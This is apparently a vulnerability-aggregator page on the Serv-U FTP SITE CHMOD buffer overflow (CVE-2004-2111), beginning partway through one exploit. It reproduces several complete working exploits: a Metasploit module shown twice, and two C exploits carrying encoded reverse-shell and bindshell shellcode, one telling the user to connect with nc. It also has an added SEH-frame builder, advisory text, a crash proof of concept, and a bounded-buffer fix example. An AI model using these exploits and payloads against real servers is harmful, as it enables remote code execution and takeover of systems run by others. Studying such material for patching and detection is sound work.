  outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
  memset(outbuffer, NOP, exploit_length);
  memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));

  printf("\n[+] Checking if \\xff doubling is necessary: ");
  send_command("SITE CHMOD 477", "-\xff\xff-");
  fgets(inbuffer, sizeof inbuffer, FILEsock);
  if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
    doubling = 1;
    printf("Yes.");
    retaddress = retaddress_4004;
    version = "4.0.0.4";
  } else {
    printf("No.");
    if (retaddress==NULL) {
      retaddress = retaddress_4100;
      version = "4.1.0.0";
    }
  }
  printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
                      version, *(int*)retaddress);
  memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
  memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));

  printf("\n[+] Sending exploit... ");
  send_command("SITE CHMOD 477", outbuffer);
  printf("send, you can now try to connect to %s:28876.\n", argv[1]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  close(sock);
  printf("\n[+] Done. \n");
  return 0;
}


// milw0rm.com [2004-01-30]
		

- Vulnerability information (18190)

Serv-U FTP Server <4.2 Buffer Overflow (EDBID:18190)
windows remote
2011-12-02 Verified
Port: 0  Author: metasploit
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Serv-U FTP Server <4.2 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the site chmod command
				in versions of Serv-U FTP Server prior to 4.2.

				You must have valid credentials to trigger this vulnerability. Exploitation
				also leaves the service in a non-functional state.
			},
			'Author'         => 'thelightcosine <thelightcosine[at]metasploit.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2111'],
					[ 'BID', '9483'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'BadChars'    => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'DisableNops' => true,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-4 EN', {
						'Ret'    => 0x750212bc, #WS2HELP.DLL
						'Offset' => 396 } ],
					[ 'Windows XP SP0-1 EN', {
						'Ret'    => 0x71aa388f, #WS2HELP.DLL
						'Offset' => 394 } ]
				],
			'DisclosureDate' => 'Dec 31 2004',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end


	def exploit
		connect_login

		eggoptions =
		{
			:checksum => true,
			:eggtag => "W00T"
		}

		hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)


		buffer = "chmod 777 "
		buffer <<  make_nops(target['Offset'] - egg.length - hunter.length)
		buffer << egg
		buffer << hunter
		buffer << "\xeb\xc9\x41\x41"	#nseh, jump back to egghunter
		buffer << [target.ret].pack('V')	#seh
		buffer << rand_text(5000)

		print_status("Trying target #{target.name}...")

		send_cmd( ['SITE', buffer] , false)

		handler
		disconnect
	end

end
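All three exploits above send the same shape of filename: filler up to the SEH record, a short jump in the next-SEH slot, a gadget address in the handler slot, then the shellcode (lion's JMP_OVER + dwJMP pairs, SkyLined's SEH_handler + retaddress, the nseh/seh lines of the Metasploit module). As an added example, not code from any of those exploits or from Metasploit, the builder below lays that frame out in C using lion's forward "eb 06" jump, the offset 396 and handler 0x750212bc from the Metasploit "Windows 2000 SP0-4 EN" target, and adds the two input checks the exploits do by hand: the bad-byte list from the module's BadChars, and the 0xff doubling that SkyLined's code probes for. The 0xcc bytes are a constructed stand-in for shellcode, not a payload.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Bytes the Serv-U command path mangles or terminates on: the BadChars
 * list from the Metasploit module. */
static const uint8_t BADCHARS[] = { 0x00, 0x7e, 0x2b, 0x26, 0x3d, 0x25, 0x3a,
                                    0x22, 0x0a, 0x0d, 0x20, 0x2f, 0x5c, 0x2e };

/* Index of the first byte of buf that is in BADCHARS, or -1 if none. */
long find_badchar(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < sizeof BADCHARS; j++)
            if (buf[i] == BADCHARS[j]) return (long)i;
    return -1;
}

/* SEH-overwrite frame:
 *   [filler up to nseh_off][EB 06 90 90][handler, little-endian][payload]
 * The handler must be a gadget that returns into the next-SEH slot
 * (pop/pop/ret or jmp ebx); the "jmp short +6" there skips the 4-byte
 * handler address and lands on the payload.  Returns the total length,
 * or 0 if cap is too small. */
size_t build_seh_frame(uint8_t *out, size_t cap, size_t nseh_off,
                       uint32_t handler, const uint8_t *payload, size_t plen)
{
    size_t total = nseh_off + 8 + plen;
    if (total > cap) return 0;
    memset(out, 'A', nseh_off);
    out[nseh_off + 0] = 0xeb;                    /* jmp short +6 */
    out[nseh_off + 1] = 0x06;
    out[nseh_off + 2] = 0x90;                    /* padding, never executed */
    out[nseh_off + 3] = 0x90;
    out[nseh_off + 4] = (uint8_t)handler;        /* handler address, LE */
    out[nseh_off + 5] = (uint8_t)(handler >> 8);
    out[nseh_off + 6] = (uint8_t)(handler >> 16);
    out[nseh_off + 7] = (uint8_t)(handler >> 24);
    memcpy(out + nseh_off + 8, payload, plen);
    return total;
}

/* Where the short jump in the next-SEH slot lands (rel8 is relative to
 * the end of the 2-byte instruction). */
size_t short_jmp_target(const uint8_t *buf, size_t nseh_off)
{
    return (size_t)((long)nseh_off + 2 + (int8_t)buf[nseh_off + 1]);
}

/* The FTP control channel is Telnet: a literal 0xff must be sent as
 * 0xff 0xff.  Returns the escaped length, or 0 if cap is too small. */
size_t ftp_iac_escape(const uint8_t *in, size_t len, uint8_t *out, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        size_t need = (in[i] == 0xff) ? 2 : 1;
        if (n + need > cap) return 0;
        out[n++] = in[i];
        if (need == 2) out[n++] = 0xff;
    }
    return n;
}

/* Self-check with offset 396 / handler 0x750212bc and a constructed
 * 4-byte stand-in payload.  Returns 63 when every bit holds: length,
 * jmp opcode, handler bytes, jump target == payload start, no bad
 * bytes, payload in place. */
int demo_frame_checks(void)
{
    static const uint8_t payload[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    uint8_t f[1024];
    size_t n = build_seh_frame(f, sizeof f, 396, 0x750212bcu, payload, 4);
    int ok = 0;
    if (n == 396 + 8 + 4) ok |= 1;
    if (f[396] == 0xeb && f[397] == 0x06) ok |= 2;
    if (f[400] == 0xbc && f[401] == 0x12 && f[402] == 0x02 && f[403] == 0x75) ok |= 4;
    if (short_jmp_target(f, 396) == 404) ok |= 8;
    if (find_badchar(f, n) == -1) ok |= 16;
    if (memcmp(f + 404, payload, 4) == 0) ok |= 32;
    return ok;
}

/* A payload with 0x0a (LF, which ends the FTP command) as its second
 * byte: the checker reports frame index 404 + 1 = 405. */
long demo_badchar_index(void)
{
    static const uint8_t payload[] = { 0xcc, 0x0a, 0xcc };
    uint8_t f[1024];
    size_t n = build_seh_frame(f, sizeof f, 396, 0x750212bcu, payload, 3);
    return find_badchar(f, n);
}

/* IAC escaping of 41 ff 42 gives 41 ff ff 42: returns 4, or -1 on mismatch. */
long demo_iac_escape(void)
{
    static const uint8_t in[] = { 0x41, 0xff, 0x42 };
    uint8_t out[8];
    size_t n = ftp_iac_escape(in, sizeof in, out, sizeof out);
    if (n != 4 || out[0] != 0x41 || out[1] != 0xff || out[2] != 0xff || out[3] != 0x42)
        return -1;
    return (long)n;
}

int main(void)
{
    printf("frame checks: %d (63 = all pass)\n", demo_frame_checks());
    printf("bad byte at frame index %ld\n", demo_badchar_index());
    printf("escaped length: %ld\n", demo_iac_escape());
    return 0;
}
```

The bad-byte check is the one worth keeping from a defender's side too: a SITE CHMOD argument that is hundreds of bytes long, free of the characters a real path would contain and carrying a valid little-endian pointer into a system DLL is exactly what a control-channel IDS rule for this bug should look for.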
		

- Vulnerability information (23591)

RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (1) (EDBID:23591)
windows remote
2004-01-24 Verified
Port: 0  Author: mandragore
source: http://www.securityfocus.com/bid/9483/info

RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existent file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible.

/*
software:       Serv-U 4.1.0.0
vendor:         RhinoSoft, http://www.serv-u.com/
credits:        kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
greets:         rosecurity team, int3liban
notes:          should work on any NT, reverse bindshell, terminates the process
author:         mandragore, sploiting@mandragore.solidshells.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>

#define fatal(x) { perror(x); exit(1); }

unsigned char sc[]={
// reverse bindshell, 204 bytes, uses import table
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,
0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,
0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,
0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,
0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,
0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,
0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};

char *user="anonymous";
char *pass="not@for.you";
char *path="/incoming";

void usage(char *argv0) {
        printf("usage: %s -d <ip_dest> [options]\n",argv0);
        printf("options:\n");
        printf(" -d target ip\n");
        printf(" -p target port (default 21)\n");
        printf(" -u username to log with (default %s)\n",user);
        printf(" -s password to log with (default %s)\n",pass);
        printf(" -w writable directory (default %s)\n",path);
        printf(" -H listening host (default 127.0.0.1)\n");
        printf(" -P listening port on host (default 80)\n");
        printf("\n");
        exit(1);
}

int main(int argc, char **argv) {
        struct sockaddr_in saddr;
        short port=21;
        int target=0, lhost=0x0100007f;
        int lport=80;
        char *buff;
        int s, ret, i;

        int delta=423;
        int callebx=0x10077A92; // libeay32.dll
        char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
        char chmod[]="SITE CHMOD 777 ";

        printf("[%%]   Serv-u v4.1.0.0 sploit by mandragore\n");

        if (argc<2)
                usage(argv[0]);

        while((i = getopt(argc, argv, "d:p:u:s:w:H:P:"))!= EOF) {
                switch (i) {
                case 'd':
                        target=inet_addr(optarg);
                        break;
                case 'p':
                        port=atoi(optarg);
                        break;
                case 'u':
                        user=optarg;
                        break;
                case 's':
                        pass=optarg;
                        break;
                case 'w':
                        path=optarg;
                        break;
                case 'H':
                        lhost=inet_addr(optarg);
                        break;
                case 'P':
                        lport=atoi(optarg);
                        break;
                default:
                        usage(argv[0]);
                        break;
                }
        }

        if ((target==-1) || (lhost==-1))
                usage(argv[0]);

        printf("[.] if working you'll have a shell on %s:%d.\n", \
                inet_ntoa(*(struct in_addr *)&lhost),lport);
        printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
                user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);

        lport=lport ^ 0x9696;
        lport=(lport & 0xff) << 8 | lport >>8;
        memcpy(sc+0x5a,&lport,2);

        lhost=lhost ^ 0x96969696;
        memcpy(sc+0x53,&lhost,4);

        buff=(char *)malloc(4096);

        saddr.sin_family = AF_INET;
        saddr.sin_addr.s_addr = target;
        saddr.sin_port = htons(port);

        s=socket(2,1,6);

        ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
        if (ret==-1)
                fatal("[-] connect()");

        ret=recv(s,buff,4095,0);
        memset(buff+ret,0,1);
        printf("%s",buff);
        
        sprintf(buff,"USER %s\r\n",user);
        printf("%s",buff);
        send(s,buff,strlen(buff),0);

        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        printf("%s",buff);
        
        sprintf(buff,"PASS %s\r\n",pass);
        printf("%s",buff);
        send(s,buff,strlen(buff),0);

        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        printf("%s",buff);

        if (strstr(buff,"230")==0) { 
                printf("[-] bad login/pass combination\n"); 
                exit(1); 
        }

        sprintf(buff,"CWD %s\r\n",path);
        printf("%s",buff);
        send(s,buff,strlen(buff),0);

        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        printf("%s",buff);

        // verify directory
        sprintf(buff,"PWD\r\n");
        send(s,buff,strlen(buff),0);
        ret=recv(s,buff,1024,0);
        memset(buff+ret,0,1);
        i=strstr(buff+5,"\x22")-buff-5;
        if (i!=1) i++;  // trailing /

        printf("[+] sending exploit..\n");

        bzero(buff,4096);
        memset(buff,0x90,600);
        strcat(buff,"\r\n");
        delta-=i; // strlen(path);
        memcpy(buff,&chmod,strlen(chmod));
        memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
        memcpy(buff+delta-9,&jmpback,5+4);
        memcpy(buff+delta,&callebx,4);

        send(s,buff,602,0);
        
        ret=recv(s,buff,1024,0);
        if ((ret==0) || (ret==-1))
                fatal("[-] ret()");
        memset(buff+ret,0,1);
        printf("%s",buff);

        close(s);

        printf("[+] done.\n");

        exit(0);
}
		

- Vulnerability information (23592)

RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (2) (EDBID:23592)
windows remote
2004-01-25 Verified
0 mslug@safechina.net
source: http://www.securityfocus.com/bid/9483/info
 
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existent file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 

/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq@0x557.org
* exp coded by mslug@safechina.net
* Jan 25 2004
*/

/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/

#include <winsock2.h>
#include <stdio.h>
#include <string.h>   /* memcpy, memset, strlen */
#include <stdlib.h>   /* atoi */

int connect_tcp(char *host, int port);   /* defined after main() below */

#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define BUF_STACK_POSITION 0x1ec
#define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION - strlen(ERR_HEADER))

// bindshell shellcode from www.cnhonker.org
#define    PORT             53
#define    PORT_OFFSET      176

//0x0A code removed from shellcode
unsigned char bdshellcode[] =
// decode
"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

//unsigned long jmp_esp = 0x77f4144b;
//unsigned long jmp_ebx = 0x77a5211b;
//unsigned long call_ebx = 0x750219d6; //use this one

unsigned char evil_chmod[5000];
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
                     "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
                     "\x33\xc0"         //below: xor eax, eax
                     "\xb0\x1c"         //mov al, 1c
                     "\x03\xd8"         //add ebx, eax
                     "\xc6\x03\x90";    //mov byte ptr [ebx], 90


int main(int argc, char **argv)
{
  WSADATA wsa;
  unsigned short port;
  int ftpsock, ret;
  char recv_buf[1000];
  unsigned long     ip;
  unsigned char buf[100];

  printf("*******************************************\n");
  printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
  printf("* Vul discovered by kkqq@0x557.org        *\n");
  printf("* Coded by mslug@safechina.net            *\n");
  printf("*******************************************\n");
  printf("\n");

  if(argc<6) {
     printf("serv.exe <host> <port> <user> <password> <path>\n");
     return 0;
  }

  WSAStartup(MAKEWORD(2,2), &wsa);

  port = htons(PORT)^(USHORT)0x9999;
  memcpy(&bdshellcode[PORT_OFFSET], &port, 2);


  ftpsock = connect_tcp(argv[1], atoi(argv[2]));
  if(ftpsock < 0) {
     printf("[-] Connection refused\n");
     return 0;
  }
  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);


  sprintf(buf, "USER %s\r\n", argv[3]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "PASS %s\r\n", argv[4]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "CWD %s\r\n", argv[5]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  memset(evil_chmod, 0x90, sizeof(evil_chmod));
  memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
  memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE], seh, strlen(seh));
  memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE+strlen(seh)+20], bdshellcode, strlen(bdshellcode));

  send(ftpsock, evil_chmod, strlen(evil_chmod), 0);

  printf("[+] Shellcode sent\n");
  printf("[+] Now nc to port 53\n");

  closesocket(ftpsock);
  WSACleanup();

  return 0;
}

int connect_tcp(char *host, int port)
{
  struct hostent *rhost;
  struct sockaddr_in sin_rhost;
  unsigned long ip_rhost;
  int sock;

  memset(&sin_rhost, 0, sizeof(sin_rhost));

  sin_rhost.sin_family = AF_INET;
  sin_rhost.sin_port = htons(port);
  ip_rhost = inet_addr(host);
  if(ip_rhost==INADDR_NONE) {
     rhost = gethostbyname(host);
     if(rhost==0) return -1;
     ip_rhost = *(unsigned long*)rhost->h_addr;
  }

  sin_rhost.sin_addr.s_addr = ip_rhost;

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if(sock<0) {
     return -1;
  }

  if(connect(sock, (struct sockaddr*) &sin_rhost, sizeof(sin_rhost))) {
     return -1;
  }

  return sock;
}
		

- Vulnerability information (F107462)

Serv-U FTP Server Buffer Overflow (PacketStormID:F107462)
2011-12-02 00:00:00
The Light Cosine  metasploit.com
exploit,overflow
CVE-2004-2111

This Metasploit module exploits a stack buffer overflow in the site chmod command in versions of Serv-U FTP Server prior to 4.2. You must have valid credentials to trigger this vulnerability. Exploitation also leaves the service in a non-functional state.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Serv-U FTP Server <4.2 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the site chmod command
				in versions of Serv-U FTP Server prior to 4.2.

				You must have valid credentials to trigger this vulnerability. Exploitation
				also leaves the service in a non-functional state.
			},
			'Author'         => 'thelightcosine <thelightcosine[at]metasploit.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2111'],
					[ 'BID', '9483'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'BadChars'    => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'DisableNops' => true,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-4 EN', {
						'Ret'    => 0x750212bc, #WS2HELP.DLL
						'Offset' => 396 } ],
					[ 'Windows XP SP0-1 EN', {
						'Ret'    => 0x71aa388f, #WS2HELP.DLL
						'Offset' => 394 } ]
				],
			'DisclosureDate' => 'Dec 31 2004',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end


	def exploit
		connect_login

		eggoptions =
		{
			:checksum => true,
			:eggtag => "W00T"
		}

		hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)


		buffer = "chmod 777 "
		buffer <<  make_nops(target['Offset'] - egg.length - hunter.length)
		buffer << egg
		buffer << hunter
		buffer << "\xeb\xc9\x41\x41"	#nseh, jump back to egghunter
		buffer << [target.ret].pack('V')	#seh
		buffer << rand_text(5000)

		print_status("Trying target #{target.name}...")

		send_cmd( ['SITE', buffer] , false)

		handler
		disconnect
	end

end
    

- Vulnerability information

3713
Serv-U FTP Server SITE CHMOD Command Filename Handling Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

- Timeline

2004-01-24 Unknown
2004-01-27 2004-01-24

- Solution

Upgrade to version 5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulnerability
Boundary Condition Error 9675
Yes No
2004-02-16 12:00:00 2007-11-15 12:37:00
Discovery of this issue is credited to Some Guy <maillist@bastart.eu.org>. This issue may also have been independently discovered by kkqq <kkqq@0x557.org>.

- Affected program versions

Rhino Software Serv-U 5.0.0.4
Rhino Software Serv-U 4.1.0.11
Rhino Software Serv-U 4.1
Rhino Software Serv-U 4.0.0.4
Rhino Software Serv-U 3.1

- Vulnerability discussion

RhinoSoft Serv-U FTP Server is prone to a remote post-authentication buffer-overflow vulnerability.

The vulnerability occurs when a malicious filename argument is passed to the SITE CHMOD command. The immediate consequences of this issue may be a denial of service. An attacker may be able to leverage this condition to execute arbitrary code in the context of the affected service, but this has not been confirmed.
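The root cause the entries above describe, as an added illustration written for this page (not Serv-U's code and not taken from any exploit listed here): the unbounded sprintf() reply is measured rather than triggered, and a bounded replacement with an explicit truncation check sits beside it. The 256-byte buffer size and the exact reply text are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not Serv-U or exploit code. The page describes a
 * fixed-size stack buffer filled by an unbounded sprintf() from the
 * client-supplied filename when SITE CHMOD names a missing file.
 * The 256-byte size and the reply text are assumptions for this example. */
#define REPLY_BUF 256
#define NOT_FOUND_FMT "550 /%s: No such file or directory.\r\n"

/* Bytes (including the NUL) the vulnerable sprintf() pattern would write.
 * snprintf(NULL, 0, ...) measures the overflow instead of triggering it. */
size_t bytes_unbounded_reply_would_write(const char *filename)
{
    int n = snprintf(NULL, 0, NOT_FOUND_FMT, filename);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* Hardened form: bounded formatting plus an explicit truncation check.
 * Returns 0 on success, -1 when the name does not fit; the caller then
 * sends a fixed generic reply instead of echoing the over-long name. */
int format_not_found_reply(char *dst, size_t dstlen, const char *filename)
{
    int n = snprintf(dst, dstlen, NOT_FOUND_FMT, filename);
    if (n < 0 || (size_t)n >= dstlen) {
        snprintf(dst, dstlen, "550 File not found.\r\n");
        return -1;
    }
    return 0;
}

/* Self-check: a constructed 399-byte name (a run of 'U', like the PoC on
 * this page) must be rejected while a short name is formatted normally.
 * Returns 1 when every expectation holds, 0 otherwise. */
int self_check(void)
{
    char reply[REPLY_BUF];
    char longname[400];
    memset(longname, 'U', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';
    if (bytes_unbounded_reply_would_write("readme.txt") > REPLY_BUF) return 0;
    if (bytes_unbounded_reply_would_write(longname) <= REPLY_BUF) return 0;
    if (format_not_found_reply(reply, sizeof reply, "readme.txt") != 0) return 0;
    if (strcmp(reply, "550 /readme.txt: No such file or directory.\r\n")) return 0;
    if (format_not_found_reply(reply, sizeof reply, longname) != -1) return 0;
    return strcmp(reply, "550 File not found.\r\n") == 0;
}
```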

- Exploit

The following proof-of-concept example will reportedly cause a server crash:

SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploit code has been supplied:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
